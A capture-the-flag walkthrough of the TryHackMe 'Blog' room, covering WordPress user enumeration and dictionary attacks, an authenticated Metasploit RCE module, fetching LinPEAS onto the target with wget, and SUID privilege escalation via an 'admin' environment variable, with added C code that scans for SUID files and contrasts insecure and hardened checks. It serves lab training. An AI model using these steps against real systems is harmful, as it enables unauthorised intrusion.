
Hello Guys!
In this post we will discuss the Blog CTF on TryHackMe.
At this point it's a new room (5 days old).
In order to get the blog to work with AWS, you’ll need to add blog.thm
to your /etc/hosts file.
URL: Blog
Difficulty: Medium
Author: Nameless0ne
As always, I started by enumerating the system.
Nmap got me the following results:

Afterwards I ran enum4linux and Gobuster with the popular common.txt wordlist.

On the actual site we can also see two names which we could use to brute-force a password:

I used all the usernames I had found up to that point and made a custom username list. I simply converted the
names into the usual username formats, for example:
bob johnson -> bob.johnson -> johnson.bob -> bob-johnson -> bob-johnson123 ...
That is what you could do on a different site. Since this is a WordPress site, we can use a tool called WPScan to
enumerate users (its --enumerate u option) and then dictionary-attack their passwords with rockyou.txt.
[i] User(s) Identified:
[+] kwheel
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] bjoel
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
As I said before, from here you can point the same tool at the two usernames it found and dictionary-attack
both users.

After getting the password for one of the users, you get access to the WordPress panel. That account has no
rights to actually post anything, so we need to escalate privileges.

Since this is an outdated WordPress version, I found an exploit for it.
It has its own Metasploit module, exploit/multi/http/wp_crop_rce. As the name says, it is an RCE exploit; note that
it is an authenticated one, so it needs the WordPress credentials you just cracked.

As we can see, we gained a Meterpreter session. We are currently www-data, so we have to escalate privileges again.

I opened a shell to navigate faster. I had to upgrade it to a proper interactive bash TTY with the following command:
python -c 'import pty; pty.spawn("/bin/bash")'

The user flag in /home/bjoel turns out to be a fake user flag.
In order to privesc the right way, I uploaded LinPEAS onto the system. I started a Python web server on my local
machine with the command
python3 -m http.server [PORT]
The web server has to be started in the folder where the file(s) you want to download are stored. Afterwards I ran
wget http://{IP}:{PORT}/linpeas.sh
on the target to download the file. Make sure to be in a directory where you are allowed to execute files; /tmp is
usually a good choice (if it is mounted noexec, /dev/shm is a common alternative). Don't forget to make the file
executable with chmod +x.

LinPEAS gave us the following SUID privesc candidates:

I additionally ran the following command to list SUID files myself:
find / -perm -4000 -type f -ls 2>/dev/null
(The -4000 in -perm matches the setuid bit; a plain -400 only matches owner-readable files, which is nearly
every file on the system.)
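To make the mode-bit point concrete, here is an added example, my own code and not part of the original writeup or of LinPEAS, that does in C what find / -perm -4000 does: walk a directory tree, test each regular file for the setuid bit, and flag any SUID binary whose name is not in a small baseline of programs you expect to be SUID on a stock Linux box. The baseline list, the temporary directory name and the file names used in the self-contained demo are assumptions for illustration.

```c
#define _XOPEN_SOURCE 700
#include <dirent.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Added example: a minimal SUID scanner in the spirit of `find / -perm -4000`
 * and the SUID section of LinPEAS. Not the room's tooling. */

/* Illustrative baseline (assumption): programs that are normally SUID on a
 * stock Linux install. A SUID file that is not on this list deserves a closer
 * look, which is exactly how "checker" stood out. */
static const char *const baseline[] = {
    "su", "sudo", "passwd", "mount", "umount", "chsh", "chfn", "newgrp",
    "gpasswd", "pkexec", "fusermount", "ping", NULL
};

struct finding {
    char path[PATH_MAX];
    int unexpected;   /* 1 if the file name is not in the baseline */
};

/* The bit that find's -perm -4000 tests: S_ISUID is octal 04000. A test for
 * 0400 (S_IRUSR, owner-readable) matches almost every file, an easy slip. */
int is_suid_mode(mode_t mode) {
    return (mode & S_ISUID) != 0;
}

static int in_baseline(const char *name) {
    for (int i = 0; baseline[i] != NULL; i++)
        if (strcmp(baseline[i], name) == 0) return 1;
    return 0;
}

/* Recursively walk `dir`, appending SUID regular files to `out` (at most `max`).
 * Unreadable entries are skipped silently, like `2>/dev/null` does for find.
 * Symlinks are not followed (lstat), so link loops cannot recurse forever. */
int scan_suid(const char *dir, struct finding *out, int max) {
    int n = 0;
    DIR *d = opendir(dir);
    if (d == NULL) return 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL && n < max) {
        if (strcmp(e->d_name, ".") == 0 || strcmp(e->d_name, "..") == 0) continue;
        char path[PATH_MAX];
        snprintf(path, sizeof path, "%s/%s", dir, e->d_name);
        struct stat st;
        if (lstat(path, &st) != 0) continue;
        if (S_ISDIR(st.st_mode)) {
            n += scan_suid(path, out + n, max - n);
        } else if (S_ISREG(st.st_mode) && is_suid_mode(st.st_mode)) {
            snprintf(out[n].path, sizeof out[n].path, "%s", path);
            out[n].unexpected = !in_baseline(e->d_name);
            n++;
        }
    }
    closedir(d);
    return n;
}

/* Self-contained demo (constructed input): build a throwaway tree with one
 * SUID file named "checker" and one ordinary file, scan it, clean up, and
 * return the number of unexpected SUID files found (1), or -1 on setup failure. */
int demo_scan(void) {
    char tmpl[] = "/tmp/suidscan.XXXXXX";   /* assumed writable temp location */
    char *root = mkdtemp(tmpl);
    if (root == NULL) return -1;

    char suid[PATH_MAX], plain[PATH_MAX];
    snprintf(suid, sizeof suid, "%s/checker", root);
    snprintf(plain, sizeof plain, "%s/notes.txt", root);
    int fd = open(suid, O_WRONLY | O_CREAT, 0755);
    if (fd >= 0) close(fd);
    fd = open(plain, O_WRONLY | O_CREAT, 0644);
    if (fd >= 0) close(fd);
    int rc = chmod(suid, S_ISUID | 0755);   /* same as `chmod 4755 checker` */

    struct finding found[16];
    int n = rc == 0 ? scan_suid(root, found, 16) : 0;
    int unexpected = 0;
    for (int i = 0; i < n; i++)
        if (found[i].unexpected) unexpected++;

    unlink(suid);
    unlink(plain);
    rmdir(root);
    return rc == 0 ? unexpected : -1;
}

int main(int argc, char **argv) {
    const char *start = argc > 1 ? argv[1] : "/";
    static struct finding found[4096];
    int n = scan_suid(start, found, 4096);
    for (int i = 0; i < n; i++)
        printf("%s %s\n", found[i].unexpected ? "[!!]" : "[ok]", found[i].path);
    printf("%d SUID files under %s\n", n, start);
    return 0;
}
```

Run it without arguments to scan the whole filesystem, or pass a directory to narrow it down; lines marked [!!] are SUID files outside the baseline, the ones worth pulling apart first.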

So as we can see, there is an unusual "checker" program. After some basic reverse engineering, I saw that I could
get root (UID 0) by setting a new environment variable.
Environment variables are name=value strings that every process inherits from whoever started it and can read
from anywhere in the program; they simply store a string. The program only requires that a variable called "admin"
exists, and since the environment is under the user's control, that is all it takes.
To create it, run the following command:
export admin=admin
Afterwards you will be able to run the program again and gain root.
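The following is an added example written for this post, not the room's checker binary (whose source is not shown), reconstructing the pattern described above: a SUID root program whose authorization decision is getenv("admin") != NULL, next to a decision that ignores the environment and uses the caller's real UID instead. The function names and the choice of UID 0 as the only trusted caller are assumptions for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* Added example reconstructing the pattern the writeup describes; not the
 * room's actual checker source. */

/* Vulnerable decision: the environment is supplied by whoever execs the
 * program, so any local user passes this with `export admin=admin`. Only the
 * presence of the variable is tested; its value is never looked at. */
int insecure_is_admin(void) {
    return getenv("admin") != NULL;
}

/* Hardened decision: use an identity the kernel maintains, the caller's real
 * UID, which a SUID program reads with getuid() and the caller cannot fake.
 * The UID is a parameter so the check can be unit-tested; main() passes
 * getuid(). Trusting only UID 0 is an assumption for this example; a real tool
 * would compare against a configured admin UID or group. */
int trusted_caller(uid_t real_uid) {
    return real_uid == 0;
}

int main(void) {
    printf("real uid %u, effective uid %u\n",
           (unsigned)getuid(), (unsigned)geteuid());
    printf("insecure check (env var 'admin' present): %s\n",
           insecure_is_admin() ? "ADMIN" : "denied");
    printf("hardened check (real uid == 0):           %s\n",
           trusted_caller(getuid()) ? "ADMIN" : "denied");

    /* In the SUID-root binary the writeup describes, an ADMIN result is
     * followed by something like setuid(0) and spawning /bin/bash, which is
     * what "gain root" means here. This demo only prints the decision. */
    return 0;
}
```

Build it, then run it once plainly and once after export admin=admin: the insecure line flips to ADMIN for any user while the hardened line stays denied unless you really are root. The dynamic loader does strip a few dangerous variables (LD_PRELOAD, LD_LIBRARY_PATH) when it starts a SUID program, but an application-level getenv() of an arbitrary name like "admin" gets no such protection, which is why authorization must never be read from the environment.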

Credits go out to Power. He is part of the BayByte team and helped
me out with the privesc!